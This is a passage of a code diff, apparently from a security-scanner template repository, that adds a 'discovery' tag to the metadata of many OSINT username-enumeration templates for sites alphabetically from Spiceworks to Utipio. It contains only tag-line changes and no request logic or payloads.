a/http/osint/user-enumeration/spiceworks.yaml b/http/osint/user-enumeration/spiceworks.yaml index ad634276ed6..758a1853404 100644 --- a/http/osint/user-enumeration/spiceworks.yaml +++ b/http/osint/user-enumeration/spiceworks.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,spiceworks + tags: osint,osint-tech,spiceworks,discovery self-contained: true diff --git a/http/osint/user-enumeration/sporcle.yaml b/http/osint/user-enumeration/sporcle.yaml index 8ef8aa5ad90..772677933f5 100644 --- a/http/osint/user-enumeration/sporcle.yaml +++ b/http/osint/user-enumeration/sporcle.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,sporcle + tags: osint,osint-gaming,sporcle,discovery self-contained: true diff --git a/http/osint/user-enumeration/spotify.yaml b/http/osint/user-enumeration/spotify.yaml index 7b6d6e03d66..e6d4fd29665 100644 --- a/http/osint/user-enumeration/spotify.yaml +++ b/http/osint/user-enumeration/spotify.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-music,spotify + tags: osint,osint-music,spotify,discovery self-contained: true diff --git a/http/osint/user-enumeration/stackoverflow.yaml b/http/osint/user-enumeration/stackoverflow.yaml index 03469176d3e..245ad0c76f0 100644 --- a/http/osint/user-enumeration/stackoverflow.yaml +++ b/http/osint/user-enumeration/stackoverflow.yaml @@ -12,7 +12,7 @@ info: metadata: verified: "true" max-request: 1 - tags: osint,osint-coding,stackoverflow + tags: osint,osint-coding,stackoverflow,discovery self-contained: true diff --git a/http/osint/user-enumeration/steam.yaml b/http/osint/user-enumeration/steam.yaml index 85f9a8f91f3..1de1c99995e 100644 --- a/http/osint/user-enumeration/steam.yaml +++ b/http/osint/user-enumeration/steam.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,steam + tags: osint,osint-gaming,steam,discovery self-contained: true diff --git a/http/osint/user-enumeration/steemit.yaml b/http/osint/user-enumeration/steemit.yaml index 428eb74278f..66d9639df76 100644 --- a/http/osint/user-enumeration/steemit.yaml +++ b/http/osint/user-enumeration/steemit.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,steemit + tags: osint,osint-social,steemit,discovery self-contained: true diff --git a/http/osint/user-enumeration/steller.yaml b/http/osint/user-enumeration/steller.yaml index b165625a62c..1e8253a92db 100644 --- a/http/osint/user-enumeration/steller.yaml +++ b/http/osint/user-enumeration/steller.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,steller + tags: osint,osint-shopping,steller,discovery self-contained: true diff --git a/http/osint/user-enumeration/stonerssocial-mastodon-instance.yaml b/http/osint/user-enumeration/stonerssocial-mastodon-instance.yaml index c4cd364299c..1cca5982cbd 100644 --- a/http/osint/user-enumeration/stonerssocial-mastodon-instance.yaml +++ b/http/osint/user-enumeration/stonerssocial-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,stonerssocial-mastodon-instance + tags: osint,osint-social,stonerssocial-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/storycorps.yaml b/http/osint/user-enumeration/storycorps.yaml index be56f3e7ce1..b11404756ad 100644 --- a/http/osint/user-enumeration/storycorps.yaml +++ b/http/osint/user-enumeration/storycorps.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-blog,storycorps + tags: osint,osint-blog,storycorps,discovery self-contained: true diff --git a/http/osint/user-enumeration/strava.yaml b/http/osint/user-enumeration/strava.yaml index 42f47be9653..c2467665c4a 100644 --- a/http/osint/user-enumeration/strava.yaml +++ b/http/osint/user-enumeration/strava.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-social,strava + tags: osint,osint-social,strava,discovery self-contained: true diff --git a/http/osint/user-enumeration/streamelements.yaml b/http/osint/user-enumeration/streamelements.yaml index c9c8c950e0f..c211f41f6b2 100644 --- a/http/osint/user-enumeration/streamelements.yaml +++ b/http/osint/user-enumeration/streamelements.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,streamelements + tags: osint,osint-finance,streamelements,discovery self-contained: true diff --git a/http/osint/user-enumeration/streamlabs.yaml b/http/osint/user-enumeration/streamlabs.yaml index aa627173b65..46d3517e58b 100644 --- a/http/osint/user-enumeration/streamlabs.yaml +++ b/http/osint/user-enumeration/streamlabs.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,streamlabs + tags: osint,osint-finance,streamlabs,discovery self-contained: true diff --git a/http/osint/user-enumeration/stripchat.yaml b/http/osint/user-enumeration/stripchat.yaml index f9758eac252..7977920e6f8 100644 --- a/http/osint/user-enumeration/stripchat.yaml +++ b/http/osint/user-enumeration/stripchat.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,stripchat + tags: osint,osint-porn,stripchat,discovery self-contained: true diff --git a/http/osint/user-enumeration/subscribestar.yaml b/http/osint/user-enumeration/subscribestar.yaml index a63e9ef26ac..f98471430f9 100644 --- a/http/osint/user-enumeration/subscribestar.yaml +++ b/http/osint/user-enumeration/subscribestar.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,subscribestar + tags: osint,osint-porn,subscribestar,discovery self-contained: true diff --git a/http/osint/user-enumeration/substack.yaml b/http/osint/user-enumeration/substack.yaml index aff9cf12cc4..8914bcca811 100644 --- a/http/osint/user-enumeration/substack.yaml +++ b/http/osint/user-enumeration/substack.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,substack + tags: osint,substack,discovery self-contained: true diff --git a/http/osint/user-enumeration/sukebeinyaasi.yaml b/http/osint/user-enumeration/sukebeinyaasi.yaml index f23b39d8c30..2d589622f20 100644 --- a/http/osint/user-enumeration/sukebeinyaasi.yaml +++ b/http/osint/user-enumeration/sukebeinyaasi.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-video,sukebeinyaasi + tags: osint,osint-video,sukebeinyaasi,discovery self-contained: true diff --git a/http/osint/user-enumeration/suzuri.yaml b/http/osint/user-enumeration/suzuri.yaml index de5fcf15871..3527f3cfc94 100644 --- a/http/osint/user-enumeration/suzuri.yaml +++ b/http/osint/user-enumeration/suzuri.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,suzuri + tags: osint,osint-business,suzuri,discovery self-contained: true diff --git a/http/osint/user-enumeration/szmerinfo.yaml b/http/osint/user-enumeration/szmerinfo.yaml index 2697dc6863f..839e2aa9d91 100644 --- a/http/osint/user-enumeration/szmerinfo.yaml +++ b/http/osint/user-enumeration/szmerinfo.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,szmerinfo + tags: osint,osint-social,szmerinfo,discovery self-contained: true diff --git a/http/osint/user-enumeration/tabletoptournament.yaml b/http/osint/user-enumeration/tabletoptournament.yaml index eaa8901908f..54f5bb2bde8 100644 --- a/http/osint/user-enumeration/tabletoptournament.yaml +++ b/http/osint/user-enumeration/tabletoptournament.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,tabletoptournament + tags: osint,osint-misc,tabletoptournament,discovery self-contained: true diff --git a/http/osint/user-enumeration/tagged.yaml b/http/osint/user-enumeration/tagged.yaml index b34f612a4bd..5e9c8d33203 100644 --- a/http/osint/user-enumeration/tagged.yaml +++ b/http/osint/user-enumeration/tagged.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,tagged + tags: osint,osint-social,tagged,discovery self-contained: true diff --git a/http/osint/user-enumeration/tamtam.yaml b/http/osint/user-enumeration/tamtam.yaml index caffff4226b..b07f3a113d8 100644 --- a/http/osint/user-enumeration/tamtam.yaml +++ b/http/osint/user-enumeration/tamtam.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,tamtam + tags: osint,osint-social,tamtam,discovery self-contained: true diff --git a/http/osint/user-enumeration/tanukipl.yaml b/http/osint/user-enumeration/tanukipl.yaml index 87175e3b864..ce7868e524c 100644 --- a/http/osint/user-enumeration/tanukipl.yaml +++ b/http/osint/user-enumeration/tanukipl.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,tanukipl + tags: osint,osint-hobby,tanukipl,discovery self-contained: true diff --git a/http/osint/user-enumeration/tapitag.yaml b/http/osint/user-enumeration/tapitag.yaml index ef817b5ae9c..73011b05f60 100644 --- a/http/osint/user-enumeration/tapitag.yaml +++ b/http/osint/user-enumeration/tapitag.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,tapitag + tags: osint,osint-business,tapitag,discovery self-contained: true diff --git a/http/osint/user-enumeration/tappy.yaml b/http/osint/user-enumeration/tappy.yaml index 0f17e58457d..5aa80817426 100644 --- a/http/osint/user-enumeration/tappy.yaml +++ b/http/osint/user-enumeration/tappy.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,tappy + tags: osint,osint-business,tappy,discovery self-contained: true diff --git a/http/osint/user-enumeration/taringa.yaml b/http/osint/user-enumeration/taringa.yaml index ddea3fb7304..6cc25dac034 100644 --- a/http/osint/user-enumeration/taringa.yaml +++ b/http/osint/user-enumeration/taringa.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,taringa + tags: osint,osint-social,taringa,discovery self-contained: true diff --git a/http/osint/user-enumeration/taskrabbit.yaml b/http/osint/user-enumeration/taskrabbit.yaml index 0464de90756..1e88194b8cf 100644 --- a/http/osint/user-enumeration/taskrabbit.yaml +++ b/http/osint/user-enumeration/taskrabbit.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,taskrabbit + tags: osint,osint-business,taskrabbit,discovery self-contained: true diff --git a/http/osint/user-enumeration/teamtreehouse.yaml b/http/osint/user-enumeration/teamtreehouse.yaml index 9c2932d7d33..7d21e8148ad 100644 --- a/http/osint/user-enumeration/teamtreehouse.yaml +++ b/http/osint/user-enumeration/teamtreehouse.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,teamtreehouse + tags: osint,osint-coding,teamtreehouse,discovery self-contained: true diff --git a/http/osint/user-enumeration/teddygirls.yaml b/http/osint/user-enumeration/teddygirls.yaml index 68dc85f6c55..fc529632503 100644 --- a/http/osint/user-enumeration/teddygirls.yaml +++ b/http/osint/user-enumeration/teddygirls.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,teddygirls + tags: osint,osint-porn,teddygirls,discovery self-contained: true diff --git a/http/osint/user-enumeration/teespring.yaml b/http/osint/user-enumeration/teespring.yaml index a1ab11f5335..94788928456 100644 --- a/http/osint/user-enumeration/teespring.yaml +++ b/http/osint/user-enumeration/teespring.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,teespring + tags: osint,osint-business,teespring,discovery self-contained: true diff --git a/http/osint/user-enumeration/teknik.yaml b/http/osint/user-enumeration/teknik.yaml index ef6d1a2ac2c..ec11fbeec6a 100644 --- a/http/osint/user-enumeration/teknik.yaml +++ b/http/osint/user-enumeration/teknik.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,teknik + tags: osint,osint-tech,teknik,discovery self-contained: true diff --git a/http/osint/user-enumeration/telegram.yaml b/http/osint/user-enumeration/telegram.yaml index a35f64963c9..65a89bb94f3 100644 --- a/http/osint/user-enumeration/telegram.yaml +++ b/http/osint/user-enumeration/telegram.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,telegram + tags: osint,osint-social,telegram,discovery self-contained: true diff --git a/http/osint/user-enumeration/tellonym.yaml b/http/osint/user-enumeration/tellonym.yaml index 79cc019dc12..7ed74e8e09b 100644 --- a/http/osint/user-enumeration/tellonym.yaml +++ b/http/osint/user-enumeration/tellonym.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,tellonym + tags: osint,osint-social,tellonym,discovery self-contained: true diff --git a/http/osint/user-enumeration/tenor.yaml b/http/osint/user-enumeration/tenor.yaml index 2fc8038d349..a3ae9cced7e 100644 --- a/http/osint/user-enumeration/tenor.yaml +++ b/http/osint/user-enumeration/tenor.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,tenor + tags: osint,osint-images,tenor,discovery self-contained: true diff --git a/http/osint/user-enumeration/tf2-backpack-examiner.yaml b/http/osint/user-enumeration/tf2-backpack-examiner.yaml index 18c0fa39271..0ca48aecd89 100644 --- a/http/osint/user-enumeration/tf2-backpack-examiner.yaml +++ b/http/osint/user-enumeration/tf2-backpack-examiner.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,tf2-backpack-examiner + tags: osint,osint-gaming,tf2-backpack-examiner,discovery self-contained: true diff --git a/http/osint/user-enumeration/thegatewaypundit.yaml b/http/osint/user-enumeration/thegatewaypundit.yaml index 001d5d30bbe..664b517378d 100644 --- a/http/osint/user-enumeration/thegatewaypundit.yaml +++ b/http/osint/user-enumeration/thegatewaypundit.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-political,thegatewaypundit + tags: osint,osint-political,thegatewaypundit,discovery self-contained: true diff --git a/http/osint/user-enumeration/theguardian.yaml b/http/osint/user-enumeration/theguardian.yaml index 1f0e5885a6f..3c4a03d12b6 100644 --- a/http/osint/user-enumeration/theguardian.yaml +++ b/http/osint/user-enumeration/theguardian.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-news,theguardian + tags: osint,osint-news,theguardian,discovery self-contained: true diff --git a/http/osint/user-enumeration/themeforest.yaml b/http/osint/user-enumeration/themeforest.yaml index a385502f4cf..4dee6360646 100644 --- a/http/osint/user-enumeration/themeforest.yaml +++ b/http/osint/user-enumeration/themeforest.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-art,themeforest + tags: osint,osint-art,themeforest,discovery self-contained: true diff --git a/http/osint/user-enumeration/thetattooforum.yaml b/http/osint/user-enumeration/thetattooforum.yaml index b3933229307..f922046719f 100644 --- a/http/osint/user-enumeration/thetattooforum.yaml +++ b/http/osint/user-enumeration/thetattooforum.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-art,thetattooforum + tags: osint,osint-art,thetattooforum,discovery self-contained: true diff --git a/http/osint/user-enumeration/threads.yaml b/http/osint/user-enumeration/threads.yaml index a526cb0e43a..e663e61f6d6 100644 --- a/http/osint/user-enumeration/threads.yaml +++ b/http/osint/user-enumeration/threads.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: osint,osint-social,threads + tags: osint,osint-social,threads,discovery self-contained: true diff --git a/http/osint/user-enumeration/tiktok.yaml b/http/osint/user-enumeration/tiktok.yaml index 4e85a8e3bbb..2a2fdbc9923 100644 --- a/http/osint/user-enumeration/tiktok.yaml +++ b/http/osint/user-enumeration/tiktok.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,tiktok + tags: osint,osint-social,tiktok,discovery self-contained: true diff --git a/http/osint/user-enumeration/tildezone-mastodon-instance.yaml b/http/osint/user-enumeration/tildezone-mastodon-instance.yaml index 3064137d9f6..e3305c25d3e 100644 --- a/http/osint/user-enumeration/tildezone-mastodon-instance.yaml +++ b/http/osint/user-enumeration/tildezone-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,tildezone-mastodon-instance + tags: osint,osint-social,tildezone-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/tinder.yaml b/http/osint/user-enumeration/tinder.yaml index 7ca20503341..2afce302e33 100644 --- a/http/osint/user-enumeration/tinder.yaml +++ b/http/osint/user-enumeration/tinder.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-dating,tinder + tags: osint,osint-dating,tinder,discovery self-contained: true diff --git a/http/osint/user-enumeration/tmdb.yaml b/http/osint/user-enumeration/tmdb.yaml index 127cea72716..0f1a2e46cc8 100644 --- a/http/osint/user-enumeration/tmdb.yaml +++ b/http/osint/user-enumeration/tmdb.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,tmdb + tags: osint,osint-social,tmdb,discovery self-contained: true diff --git a/http/osint/user-enumeration/tootingch-mastodon-instance.yaml b/http/osint/user-enumeration/tootingch-mastodon-instance.yaml index 1e5be3ec593..f833692f851 100644 --- a/http/osint/user-enumeration/tootingch-mastodon-instance.yaml +++ b/http/osint/user-enumeration/tootingch-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,tootingch-mastodon-instance + tags: osint,osint-social,tootingch-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/topcoder.yaml b/http/osint/user-enumeration/topcoder.yaml index 2a647ff0cba..633b75a1c1f 100644 --- a/http/osint/user-enumeration/topcoder.yaml +++ b/http/osint/user-enumeration/topcoder.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-coding,topcoder + tags: osint,osint-coding,topcoder,discovery self-contained: true diff --git a/http/osint/user-enumeration/totalwar.yaml b/http/osint/user-enumeration/totalwar.yaml index 74345dc3adc..34cd882698e 100644 --- a/http/osint/user-enumeration/totalwar.yaml +++ b/http/osint/user-enumeration/totalwar.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,totalwar + tags: osint,osint-gaming,totalwar,discovery self-contained: true diff --git a/http/osint/user-enumeration/toyhouse.yaml b/http/osint/user-enumeration/toyhouse.yaml index 1274a674b88..a00981191aa 100644 --- a/http/osint/user-enumeration/toyhouse.yaml +++ b/http/osint/user-enumeration/toyhouse.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,toyhouse + tags: osint,osint-hobby,toyhouse,discovery self-contained: true diff --git a/http/osint/user-enumeration/trackmanialadder.yaml b/http/osint/user-enumeration/trackmanialadder.yaml index a96a295d34b..01643fffd67 100644 --- a/http/osint/user-enumeration/trackmanialadder.yaml +++ b/http/osint/user-enumeration/trackmanialadder.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,trackmanialadder + tags: osint,osint-gaming,trackmanialadder,discovery self-contained: true diff --git a/http/osint/user-enumeration/tradingview.yaml b/http/osint/user-enumeration/tradingview.yaml index f255c12e1c5..df7446f777b 100644 --- a/http/osint/user-enumeration/tradingview.yaml +++ b/http/osint/user-enumeration/tradingview.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,tradingview + tags: osint,osint-finance,tradingview,discovery self-contained: true diff --git a/http/osint/user-enumeration/trakt.yaml b/http/osint/user-enumeration/trakt.yaml index 598575bd9ec..440087855e7 100644 --- a/http/osint/user-enumeration/trakt.yaml +++ b/http/osint/user-enumeration/trakt.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-video,trakt + tags: osint,osint-video,trakt,discovery self-contained: true diff --git a/http/osint/user-enumeration/trello.yaml b/http/osint/user-enumeration/trello.yaml index 4f77e2529fc..baf26905761 100644 --- a/http/osint/user-enumeration/trello.yaml +++ b/http/osint/user-enumeration/trello.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,trello + tags: osint,osint-social,trello,discovery self-contained: true diff --git a/http/osint/user-enumeration/tripadvisor.yaml b/http/osint/user-enumeration/tripadvisor.yaml index aec78501c9e..26d440b530f 100644 --- a/http/osint/user-enumeration/tripadvisor.yaml +++ b/http/osint/user-enumeration/tripadvisor.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,tripadvisor + tags: osint,osint-social,tripadvisor,discovery self-contained: true diff --git a/http/osint/user-enumeration/truth-social.yaml b/http/osint/user-enumeration/truth-social.yaml index e33b8ae6e5f..6ef80f001e7 100644 --- a/http/osint/user-enumeration/truth-social.yaml +++ b/http/osint/user-enumeration/truth-social.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,truth-social + tags: osint,osint-social,truth-social,discovery self-contained: true diff --git a/http/osint/user-enumeration/tryhackme.yaml b/http/osint/user-enumeration/tryhackme.yaml index f2782cae036..4cf6329fff4 100644 --- a/http/osint/user-enumeration/tryhackme.yaml +++ b/http/osint/user-enumeration/tryhackme.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,tryhackme + tags: osint,osint-social,tryhackme,discovery self-contained: true diff --git a/http/osint/user-enumeration/tumblr.yaml b/http/osint/user-enumeration/tumblr.yaml index 7dfe8afc1b6..78d4fd32240 100644 --- a/http/osint/user-enumeration/tumblr.yaml +++ b/http/osint/user-enumeration/tumblr.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,tumblr + tags: osint,osint-images,tumblr,discovery self-contained: true diff --git a/http/osint/user-enumeration/tunefind.yaml b/http/osint/user-enumeration/tunefind.yaml index 568914ad024..54249c3c5cc 100644 --- a/http/osint/user-enumeration/tunefind.yaml +++ b/http/osint/user-enumeration/tunefind.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-music,tunefind + tags: osint,osint-music,tunefind,discovery self-contained: true diff --git a/http/osint/user-enumeration/twitcasting.yaml b/http/osint/user-enumeration/twitcasting.yaml index 10f21a5f0ee..d8f054229f8 100644 --- a/http/osint/user-enumeration/twitcasting.yaml +++ b/http/osint/user-enumeration/twitcasting.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,twitcasting + tags: osint,osint-social,twitcasting,discovery self-contained: true diff --git a/http/osint/user-enumeration/twitch.yaml b/http/osint/user-enumeration/twitch.yaml index 549d5040986..311665eb3bd 100644 --- a/http/osint/user-enumeration/twitch.yaml +++ b/http/osint/user-enumeration/twitch.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,twitch + tags: osint,osint-gaming,twitch,discovery self-contained: true diff --git a/http/osint/user-enumeration/twitter-archived-profile.yaml b/http/osint/user-enumeration/twitter-archived-profile.yaml index a8f27615c1a..43c882b2846 100644 --- a/http/osint/user-enumeration/twitter-archived-profile.yaml +++ b/http/osint/user-enumeration/twitter-archived-profile.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-archived,twitter-archived-profile + tags: osint,osint-archived,twitter-archived-profile,discovery self-contained: true diff --git a/http/osint/user-enumeration/twitter-archived-tweets.yaml b/http/osint/user-enumeration/twitter-archived-tweets.yaml index df62611ca16..fa9ace4b910 100644 --- a/http/osint/user-enumeration/twitter-archived-tweets.yaml +++ b/http/osint/user-enumeration/twitter-archived-tweets.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-archived,twitter-archived-tweets + tags: osint,osint-archived,twitter-archived-tweets,discovery self-contained: true diff --git a/http/osint/user-enumeration/twitter.yaml b/http/osint/user-enumeration/twitter.yaml index e227266faae..088fe5fa132 100644 --- a/http/osint/user-enumeration/twitter.yaml +++ b/http/osint/user-enumeration/twitter.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,twitter + tags: osint,osint-social,twitter,discovery self-contained: true diff --git a/http/osint/user-enumeration/twpro.yaml b/http/osint/user-enumeration/twpro.yaml index ec61dcea16c..6a8afa3a643 100644 --- a/http/osint/user-enumeration/twpro.yaml +++ b/http/osint/user-enumeration/twpro.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,twpro + tags: osint,osint-social,twpro,discovery self-contained: true diff --git a/http/osint/user-enumeration/ubisoft.yaml b/http/osint/user-enumeration/ubisoft.yaml index 4373a6d8e80..3c7e7d17457 100644 --- a/http/osint/user-enumeration/ubisoft.yaml +++ b/http/osint/user-enumeration/ubisoft.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,ubisoft + tags: osint,osint-gaming,ubisoft,discovery self-contained: true diff --git a/http/osint/user-enumeration/udemy.yaml b/http/osint/user-enumeration/udemy.yaml index e4241560c82..832140ae197 100644 --- a/http/osint/user-enumeration/udemy.yaml +++ b/http/osint/user-enumeration/udemy.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,udemy + tags: osint,osint-tech,udemy,discovery self-contained: true diff --git a/http/osint/user-enumeration/uefconnect.yaml b/http/osint/user-enumeration/uefconnect.yaml index 06aaf62225d..a7366c3a672 100644 --- a/http/osint/user-enumeration/uefconnect.yaml +++ b/http/osint/user-enumeration/uefconnect.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,uefconnect + tags: osint,osint-business,uefconnect,discovery self-contained: true diff --git a/http/osint/user-enumeration/uid.yaml b/http/osint/user-enumeration/uid.yaml index 2eb0a0df1db..523f85c219a 100644 --- a/http/osint/user-enumeration/uid.yaml +++ b/http/osint/user-enumeration/uid.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,uid + tags: osint,osint-social,uid,discovery self-contained: true diff --git a/http/osint/user-enumeration/uiuxdevsocial-mastodon-instance.yaml b/http/osint/user-enumeration/uiuxdevsocial-mastodon-instance.yaml index 5b9821efdb6..1c9d082a28a 100644 --- a/http/osint/user-enumeration/uiuxdevsocial-mastodon-instance.yaml +++ b/http/osint/user-enumeration/uiuxdevsocial-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,uiuxdevsocial-mastodon-instance + tags: osint,osint-social,uiuxdevsocial-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/ultras-diary.yaml b/http/osint/user-enumeration/ultras-diary.yaml index 29619b24548..1af5eab4b51 100644 --- a/http/osint/user-enumeration/ultras-diary.yaml +++ b/http/osint/user-enumeration/ultras-diary.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,ultras-diary + tags: osint,osint-hobby,ultras-diary,discovery self-contained: true diff --git a/http/osint/user-enumeration/ulubpl.yaml b/http/osint/user-enumeration/ulubpl.yaml index 27b64b74cfa..f38adc119a2 100644 --- a/http/osint/user-enumeration/ulubpl.yaml +++ b/http/osint/user-enumeration/ulubpl.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,ulubpl + tags: osint,osint-misc,ulubpl,discovery self-contained: true diff --git a/http/osint/user-enumeration/unsplash.yaml b/http/osint/user-enumeration/unsplash.yaml index c47ec786ae6..8b59b7e18b3 100644 --- a/http/osint/user-enumeration/unsplash.yaml +++ b/http/osint/user-enumeration/unsplash.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,unsplash + tags: osint,osint-images,unsplash,discovery self-contained: true diff --git a/http/osint/user-enumeration/untappd.yaml b/http/osint/user-enumeration/untappd.yaml index 4f54b5a73d9..b6c39d34992 100644 --- a/http/osint/user-enumeration/untappd.yaml +++ b/http/osint/user-enumeration/untappd.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,untappd + tags: osint,osint-social,untappd,discovery self-contained: true diff --git a/http/osint/user-enumeration/usa-life.yaml b/http/osint/user-enumeration/usa-life.yaml index 40678c3bd74..2af9838033b 100644 --- a/http/osint/user-enumeration/usa-life.yaml +++ b/http/osint/user-enumeration/usa-life.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,usa-life + tags: osint,osint-social,usa-life,discovery self-contained: true diff --git a/http/osint/user-enumeration/utipio.yaml b/http/osint/user-enumeration/utipio.yaml index 19a66bd446a..7829a7d6bf2 100644 --- 